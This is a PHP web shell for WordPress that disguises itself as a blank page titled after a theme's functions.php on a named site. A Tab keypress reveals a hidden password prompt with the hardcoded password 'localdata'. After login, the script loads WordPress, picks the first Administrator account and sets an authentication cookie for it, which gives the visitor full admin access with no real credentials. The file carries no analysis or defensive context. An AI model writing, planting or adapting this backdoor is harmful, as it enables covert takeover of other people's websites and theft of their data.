<?php
	session_start();


	$valid_password = 'localdata'; 

	if (!isset($_SESSION['authenticated'])) {
		if ($_SERVER['REQUEST_METHOD'] === 'POST') {
			$pass = $_POST['password'] ?? '';
			if ($pass === $valid_password) {
				$_SESSION['authenticated'] = true;
				header('Location: ' . $_SERVER['PHP_SELF']);
				exit;
			} else {
				$error = "Password salah.";
			}
		}


		?>
		<!DOCTYPE html>
		<html>
		<head>
			<title>www.bottegagastronomica.it/wp-content/themes/twentytwentyfour/functions.php</title>
			<style>
				body {
					margin: 0;
					background-color: #fff;
				}
				#passwordForm {
					display: none;
					position: absolute;
					top: 40%;
					left: 50%;
					transform: translate(-50%, -50%);
					text-align: center;
				}
				input[type="password"] {
					padding: 10px;
					font-size: 16px;
				}
				button {
					padding: 10px 20px;
					font-size: 16px;
					margin-top: 10px;
				}
			</style>
		</head>
		<body>
			<div id="passwordForm">
				<form method="POST">
					<?php if (!empty($error)) echo "<p style='color:red;'>$error</p>"; ?>
					<input type="password" name="password" placeholder="Enter Password" autofocus><br>
					<button type="submit">Login</button>
				</form>
			</div>

			<script>
				document.addEventListener('keydown', function(e) {
					if (e.key === "Tab") {
						e.preventDefault(); // cegah tab berpindah fokus
						document.getElementById('passwordForm').style.display = 'block';
					}
				});
			</script>
		</body>
		</html>
		<?php
		exit;
	}


	$mr = $_SERVER['DOCUMENT_ROOT'];
	@chdir($mr);

	if (file_exists('wp-load.php')) {
		include 'wp-load.php';

		$wp_user_query = new WP_User_Query(array(
			'role' => 'Administrator',
			'number' => 1,
			'fields' => 'ID'
		));

		$results = $wp_user_query->get_results();

		if (isset($results[0])) {
			wp_set_auth_cookie($results[0]);
			wp_redirect(admin_url());
			exit;
		} else {
			die('NO ADMIN');
		}
	} else {
		die('Failed to load');
	}
	?>